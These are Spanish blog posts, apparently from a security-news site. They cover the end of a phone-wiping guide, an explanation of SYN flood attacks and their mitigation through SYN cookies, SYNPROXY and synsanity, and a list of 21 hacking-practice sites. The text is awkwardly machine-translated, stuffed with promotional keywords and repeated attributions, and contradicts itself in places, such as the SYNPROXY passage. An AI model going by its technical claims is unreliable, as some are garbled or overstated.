El teléfono se reiniciará y tomará alrededor de 2-5 minutos para reiniciar. Asegúrese de que tiene suficiente batería para manejar el proceso y la batería no se retira durante el proceso. Esto puede conducir a la corrupción de los datos.

PASO 3: CARGA DE DATOS FALSOS Y RESTABLECE TU TELEFONO DE FÁBRICA

Si no estás satisfecho y quieres ir aún más lejos con la protección de datos personales, a continuación, puede agregar algunos pasos adicionales explica experto de servicios de protección de datos.

Cargar datos falsos en su teléfono, puedes conectar el teléfono a una PC y copiar / pegar cosas que sean lo suficientemente grandes como para llenar todo el espacio (aunque no es necesario llenar todo el espacio, más es simplemente mejor).

Después de cargar todos los datos falsos, hacer otro reinicio de fábrica al igual que en el Paso 2. Ahora, ¿cómo este paso adicional añade más protección? Al cargar datos falsos y eliminarlos mediante la opción de restablecimiento tu teléfono de fábrica, todos sus datos personales será enterrado bajo todos los datos falsos, lo que los hace  aún más difícil de alcanzar.

Si aún no está satisfecho, a continuación, repetir este paso tantas veces quiera hasta que esté completamente satisfecho. Este proceso no hace borrado seguro de datos pero asegura que sea difícil recuperar tus datos.

¿CÓMO PROTEGERSE DE LOS ATAQUES DDOS DE SYN FLOOD?

Posted on

Según expertos de ethical hacking, SYN floods son uno de los ataques más antiguos y comunes, tan común que el núcleo de Linux incluye algo de ellos construidos en apoyo a la mitigación de los mismos. Cuando un cliente se conecta a un servidor a través de TCP, este utiliza el protocolo de tres vías para sincronizar:

synflood1

Un paquete SYN es esencialmente el cliente diciendo al servidor “Me gustaría conectar”. Durante este protocolo, el cliente y el servidor de generan aleatoriamente Initial Sequence Numbers (ISNs), que se utilizan para sincronizar la conexión TCP entre dos partes. Expertos de seguridad en páginas web explican que estos números de secuencia TCP permiten hacer un seguimiento de los mensajes que se han enviado y confirmado por la otra parte.

Acuerdo a curso de ethical hacking, SYN flood abusa de este protocolo de enlace sólo yendo por una parte del camino a través del protocolo. En lugar de progresar a través de la secuencia normal, un atacante inunda el servidor destino con el mayor número de paquetes SYN como puedan reunir, de tantos equipos diferentes como puedan, y suplantaciones de origen IP tanto como les sea posible.

synflood2

El host con nada de seguridad en páginas web que recibe el SYN floods debe responder a todos y cada uno de los paquetes con un SYN-ACK, pero por desgracia la IP de origen fue probablemente suplantada, por lo que irán a ninguna parte (o peor, volverá como rechazada). Estos paquetes son casi indistinguibles de los verdaderos paquetes SYN de clientes reales, lo que significa que es difícil o imposible de filtrar a los malos en el servidor.

Para empeorar las cosas, cuando el servidor está manejando las conexiones normales y recibe el ACK de un cliente real, sigue siendo necesario saber que se trataba de un paquete SYN que se envió, por lo que también debe mantener una lista de conexiones (en estado SYN_RECV) en la cual un SYN ha sido recibido y un ACK aún no ha sido recibido.

Si la cola de conexiones en SYN_RECV no tiene límite de tamaño, la memoria se agotará rápidamente menciona Dan Levis profesor de seguridad en páginas web de International Institute of Cyber Security. Si este tiene un límite de tamaño, como es el caso de Linux, entonces no hay más espacio para almacenar el estado y las conexiones serán simplemente fallidas y los paquetes serán descartados.

SYN COOKIES

SYN cookies son una forma inteligente de evitar el almacenamiento de estado de conexión TCP durante el protocolo de enlace inicial, aplazando dicho almacenamiento hasta que un ACK válido haya sido recibido. Funciona por la elaboración del Initial Sequence Number (ISN) en el paquete SYN-ACK enviado por el servidor de tal manera que criptográficamente desmenuza detalles sobre el paquete inicial SYN y sus opciones TCP, de modo que el servidor puede validar que generó el paquete SYN-ACK para el cual un ACK ahora se está recibiendo. El servidor no almacena ningún estado en la conexión hasta que el ACK (que contiene la SYN cookie validada) se recibe, y sólo en ese momento se el estado regenerado y se almacenado menciona Dan Levis profesor de seguridad en páginas web.

Acuerdo a curso de ethical hacking, esta hash es calculada con un secreto que sólo el servidor sabe, no debilita significativamente la selección del número de secuencia y aun así es difícil que alguien forje un ACK para una conexión diferente sin haber visto el SYN-ACK del servidor real.

SYNPROXY

Una solución de seguridad en páginas web para obtener lo mejor de ambos mundos era el módulo synproxy. Este se sienta en netfilter en el núcleo, antes del TCP Linux stack, y como su nombre indica, apoderada todas las conexiones, mientras que genera SYN cookies. Cuando un paquete SYN llega, responde con un SYN-ACK y tira a la basura todo el estado. Tras la recepción de un paquete ACK correspondientemente a SYN cookie, eso luego envía un SYN y completa la conexión TCP habitual. Por cada paquete siguiente en cada dirección, modifica los números de secuencia de manera que es transparente a ambos lados.

synflood3

Esta es una manera bastante intrusiva de resolver el problema de seguridad en páginas web, ya que afecta a todos los paquetes durante toda la conexión, pero no mitiga exitosamente SYN floods. Por desgracia, encontramos que bajo ataque se rompió y provocó una caída del sistema.

SYNSANITY

Introduzca synsanity, la solución es mitigar SYN floods en Linux 3.x usuado por expertos de ethical hacking. Synsanity se inspira en SYNPROXY, en que se trata de un módulo de iptables que se encuentra entre Linux TCP stack y la tarjeta de red. La principal diferencia es que en lugar de tocar todos los paquetes, synsanity simplemente genera una cookie SYN similar a la forma en que el núcleo de Linux generaría si el SYN queue estaba lleno, y una vez que se valida el paquete ACK, eso permite llegar hasta Linux SYN cookie code, que crea y completa la conexión. Después de este punto, synsanity no toca ningún paquete adicional en la conexión TCP menciona Dan Levis profesor de seguridad en páginas web en IICS(iicybersecurty).

synflood4

Synsanity permite mitigar múltiples ataques que han causado previamente una interrupción del servicio parcial o completo, tanto los ataques de larga ejecución y ataques a gran volumen.

synflood5

Fuente:http://noticiasseguridad.com/importantes/como-protegerse-de-los-ataques-ddos-de-syn-flood/

21 SITIOS PARA PRACTICAR SUS HABILIDADES DE HACKING Y CIBERSEGURIDAD

Posted on

Servicios y soluciones de ciberseguridad se encuentran en tan alta demanda en este momento. A medida que el mundial siga convirtiendo todo en una aplicación y conectando incluso los dispositivos más básicos de internet, la demanda sólo va a crecer, por lo que no es de extrañar que todos quieran aprender hacking estos días.

Sin embargo, casi todos los días nos encontramos con un mensaje en el foro en el que alguien está pidiendo a donde deben empezar a aprender hacking o la forma de practicar hacking. Hemos recopilado esta lista de algunos de los mejores sitios de ciberseguridad, seguridad perimetral y hacking acuerdo a curso de ciberseguridad que esperamos sea un valioso recurso para los que se preguntan cómo pueden construir y practicar su conjunto de habilidades de hacking.

 

1. CTF365

En CTF365 los usuarios construyen y defienden sus propios servidores con soluciones de ciberseguridad, mientras que lanzan ataques a los servidores de otros usuarios. El entorno de formación CTF365 está diseñado para profesionales de seguridad perimetral que están interesados en el curso de ciberseguridad y formación de sus habilidades ofensivas o sysadmins interesados en mejorar sus habilidades defensivas. Si usted es un principiante a infosec, puede registrarse para obtener una cuenta gratuita para principiantes y empezar a probar con algunos servidores vulnerables pre-configurados.

 

CTF365

2. OVERTHEWIRE

OverTheWire está diseñado para personas de cualquier nivel de experiencia con soluciones de ciberseguridad para aprender y practicar conceptos de curso de ciberseguridad. Los principiantes absolutos van a querer comenzar en los retos del Bandit, ya que son los bloques de construcción que utilizará para completar otros retos.

 

Overthewire

3. HACKING-LAB

Hacking-Lab ofrece los desafíos del CTF (Desafío Europea para la Seguridad Cibernética), sino que también alberga desafíos en marcha para su plataforma que cualquiera puede participar. Según expertos de soluciones de ciberseguridad, sólo es necesario registrarse con cuenta gratuita, configurar vpn y comenzar a explorar los desafíos que ofrecen.

 

hacking-lab

 

4. PWNABLE.KR

pwnable.kr se centra en los retos ” pwn”, similar a CTF, que requieren encontrar, leer y enviar archivos de “bandera” que corresponden a cada desafío. Debes usar algún tipo de programación, ingeniería inversa o habilidad explotación para acceder al contenido de los archivos antes de estar en condiciones de presentar las soluciones de ciberseguridad. Dividen el reto en 4 niveles de habilidades de curso de ciberseguridad: Toddler’s Bottle, Rookiss, Grotesque and Hacker’s Secret.

 

pwnable.kr

 

5. IO

IO es un juego de guerra de los creadores de netgarage.org, un proyecto comunitario, donde personas afines comparten conocimientos acerca del curso de ciberseguridad, seguridad perimetral, la IAVR y mucho más. Han creado 3 versiones, IO, IO64 y IOarm, con IO que es el más maduro. Conecte a IO a través de SSH y puedes comenzar el hackeo en sus desafíos.

 

io-wargame

 

6. SMASH THE STACK

Smash The Stack se compone de 7 diferentes juegos de guerra contra soluciones de ciberseguridad – Amateria, Apfel, Blackbox, Blowfish, CTF logic y Tux. Cada juegeo tiene una variedad de desafíos que van desde las vulnerabilidades estándar para retos de ingeniería inversa de malware.

 

smash-the-stack

 

7. MICROCORRUPTION

Microcorruption es un CTF de seguridad incorporado donde usted tiene que hacer ingeniería inversa a dispositivos Lockitall de tipo candado electrónico. Según expertos de curso de ciberseguridad y seguridad perimetral en el camino usted aprenderá un poco de montaje, cómo utilizar un depurador, cómo desbloquear en un solo paso el código de bloqueo, establecer puntos de interrupción, y examinar la memoria, todo ello en un intento de robar los bonos al portador de los almacenes.

 

microcorruption

 

8. REVERSING.KR

reversing.kr cuenta con 26 desafíos para poner a prueba sus capacidades de ingeniería inversa y soluciones de ciberseguridad. El sitio no ha sido actualizado desde finales de 2012, pero los desafíos aún están disponibles y son valiosos recursos de aprendizaje.

 

reversing.kr

 

9. HACKTHISSITE

HackThissite es un sitio libre para probar juegos de guerra y ampliar sus habilidades de hacking y seguridad perimetral. Cuenta con numerosas misiones de hacking contra soluciones de ciberseguridad a través de múltiples categorías, incluyendo básico, realista, aplicación, programación, phreaking teléfono, JavaScript, forense, Stego y misiones de IRC.

 

hackthissite

10. W3CHALLS

W3Challs es una plataforma de curso de ciberseguridad con numerosos retos a través de diferentes categorías, incluyendo hacking, cracking, juegos de guerra, forense, Criptografía, esteganografía y programación. Según expertos de seguridad perimetral, el objetivo de la plataforma es proporcionar retos realistas, no simulaciones y los puntos se otorgan en base a la dificultad del reto (fácil, medio, difícil). Hay un foro de seguridad perimetral donde se puede discutir y atravesar los desafíos con otros miembros.

 

w3challs

 

11. PWN0

pwn0 es la VPN donde (casi) todo pasa. Según profesor de curso de ciberseguridad y seguridad perimetral está enfocado a Ir en contra de pwn0bots u otros usuarios y sumar puntos mediante la obtención de la raíz en otros sistemas.

 

pwn0 

12. EXPLOIT EXERCISES

Exploit Exercises ofrece una variedad de máquinas virtuales, la documentación y los desafíos que se pueden utilizar para aprender sobre una variedad de temas curso de ciberseguridad y seguridad perimetral como escalada de privilegios, análisis de vulnerabilidad, explotar el desarrollo, depuración, ingeniería inversa, y las soluciones de seguridad cibernética en general.

 

exploit-excercise

 

13. RINGZER0 TEAM ONLINE CTF

RingZer0 Team Online CTF ofrece un montón de desafíos, alrededor de 234, que pondrá a prueba sus habilidades de hacker a través de múltiples categorías, incluyendo la criptografía, Escapar de la cárcel, análisis de malware, inyección SQL, codificación Shell y más. Según profesor de curso de ciberseguridad después de completar con éxito un reto, puede escribir hasta su solución y enviarlo al RingZer0team. Si se acepta su escritura, usted ganará RingZer0Gold que puede ser intercambiado por consejos durante los retos futuros.

 

RingZer0 Team Online CTF

 

14. HELLBOUND HACKERS

Los hackers hellbound ofrece tradicionales desafíos de explotación, pero también ofrecen algunos de los retos que otros no tienen, como web y parcheo de aplicaciones y desafíos cronometrados. Acuerdo a curso de ciberseguridad y seguridad perimetral en los retos web y parcheo de aplicaciones tienen que evaluar un pequeño fragmento de código, la identificación de la código explotable y sugerir el código de parche.

 

hellbound-hackers

 

15. TRY2HACK

Try2Hack proporciona retos orientados a las soluciones de ciberseguridad y seguridad perimetral para su entretenimiento y es uno de los sitios más antiguos de desafíos que aun esta alrededor. Los desafíos son diversos y se hacen progresivamente más difíciles.

 

try2hack

16. HACK.ME

Hack.me es una gran colección de aplicaciones web vulnerables para practicar sus habilidades de hacker ofensivos y seguridad perimetral. Todas las aplicaciones web vulnerables son aportadas por la comunidad y cada uno se puede ejecutar en un entorno limitado de seguridad aislado.

 

hack-me

 

17. HACKTHIS !!

HackThis !!Se compone de más de 50 niveles de hacking y seguridad perimetral; cada uno tiene un valor de un número determinado de puntos en función de su nivel de dificultad.

 

hackthis

18. ENIGMA GROUP

Enigma Group cuenta con más de 300 desafíos con un enfoque en las Top 10 OWASP vulnerabilidades y curso de ciberseguridad. Ellos cuentan con casi 48.000 miembros activos y albergan desafíos CTF semanales, así como concursos semanales y mensuales de seguridad perimetral.

 

enigma-group

 

19. GOOGLE GRUYERE

Google Gruyere muestra cómo vulnerabilidades de las aplicaciones web pueden ser explotadas y cómo defenderse contra estos ataques. Acuerdo a curso de ciberseguridad, usted tendrá la oportunidad de hacer algunas pruebas de intrusión real y realmente explotar una aplicación real con ataques como XSS y XSRF.

 

google-gruyere

 

20. GAME OF HACKS

Game of Hacks te presenta una serie de fragmentos de código, estilo cuestionario de opción múltiple, y se debe identificar la vulnerabilidad del código correcto.

 

game-of-hacks

 

21. ROOT ME

Root Me acoge a más de 200 desafíos de hacking, soluciones de ciberseguridad y 50 entornos virtuales que te permiten practicar tus habilidades de hacker a través de una variedad de escenarios.

 

root-me

Podría aprender más sobre soluciones de ciberseguridad, seguridad perimetral etc durante el curso de ciberseguridad.